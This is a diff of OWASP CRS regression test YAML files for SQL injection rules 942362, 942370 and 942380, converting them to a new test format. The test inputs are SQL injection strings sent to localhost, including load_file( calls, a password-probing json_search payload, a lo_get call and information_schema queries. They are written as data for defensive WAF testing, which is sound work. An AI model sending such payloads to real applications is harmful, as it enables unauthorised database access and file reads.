dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS Role FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `edit_user_id` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS val FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%60+REGEXP%20" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS 'Durchschnitt_Importzeit' FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 15 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `OXTIMESTAMP` from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as col_0_0_ from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS `count` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as User from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as User from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS t FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "(load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "(load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as ExecuteTheseSQLCommands FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") AS schlagwoerter FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "` AS `documentType` FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-25 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "! As' from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-26 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "! As' from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "; As not from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-27 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "; As not from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT load_file(" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-28 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 30 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 31 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 32 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942362" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index a071e20b2..18ba3f0fa 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -7,10 +7,9 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. If you know what a particular expression is supposed to catch, please revise the associated test. - enabled: true - name: 942370.yaml +rule_id: 942370 tests: - - test_title: 942370-1 + - test_id: 1 desc: | [\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d @@ -19,93 +18,93 @@ tests: [\"'`]\s*?\*.+between\W*?[\"'`]\d [\"'`]\s*?\*.+and\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 or '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 2 desc: | [\"'`]\s*?\*.+id\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 id '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 3 desc: | [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' = # '" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' = # '" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 4 desc: | [^\w\s]+\s*?[\W\d].*?# stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' ? # = #" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 5 desc: | [^\w\s]+\s*?[\W\d].*?-- stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='? # = --" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='? # = --" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 6 desc: | [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d @@ -114,102 +113,102 @@ tests: [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' or homer 9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 7 desc: | \^[\"'`] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=^'" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=^'" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 8 desc: | [\"'`].*?\*\s*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"` * 12344" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 9 desc: | [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=>foo##'." - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=>foo##'." + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 10 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 11 desc: encode(lo_get(16400),'base64')::int stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16400),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index d229d33f4..c3445da07 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -1,772 +1,770 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942380.yaml +rule_id: 942380 tests: - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 